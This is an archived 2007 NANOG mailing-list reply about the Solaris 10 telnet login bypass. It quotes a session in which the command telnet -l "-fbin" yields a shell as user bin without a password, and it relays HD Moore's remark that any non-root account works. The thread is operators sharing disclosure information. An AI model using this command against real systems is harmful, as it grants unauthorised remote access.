[94847] in North American Network Operators' Group


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Solaris 10 Telnet Exploit

daemon@ATHENA.MIT.EDU (Gadi Evron)
Sun Feb 11 23:54:03 2007

Date: Sun, 11 Feb 2007 22:53:06 -0600 (CST)
From: Gadi Evron <ge@linuxbox.org>
To: William Schultz <wschultz@bsdboy.com>
Cc: nanog@merit.edu
In-Reply-To: <A8780059-AE19-4ED7-AB95-BDCB262E4C22@bsdboy.com>
Errors-To: owner-nanog@merit.edu


From HD Moore:
"but this bug isnt -froot, its -fanythingbutroot =P"

On Sun, 11 Feb 2007, William Schultz wrote:

> 
> http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day- 
> disable.html
> 
> Tested on Sol10, and it indeed works... Good thing we use SSH, right?!
> 
> ################################
> iWil:~ wschultz$ telnet -l "-fbin" dns1
> Trying A.B.C.D...
> Connected to dns1.my.com.
> Escape character is '^]'.
> Last login: Sun Feb 11 18:11:05 from A.B.C.D
> Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
> $ id
> uid=2(bin) gid=2(bin)
> $
> ################################
>


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[94847] in North American Network Operators' Group

Re: Solaris 10 Telnet Exploit

daemon@ATHENA.MIT.EDU (Gadi Evron)Sun Feb 11 23:54:03 2007

daemon@ATHENA.MIT.EDU (Gadi Evron)
Sun Feb 11 23:54:03 2007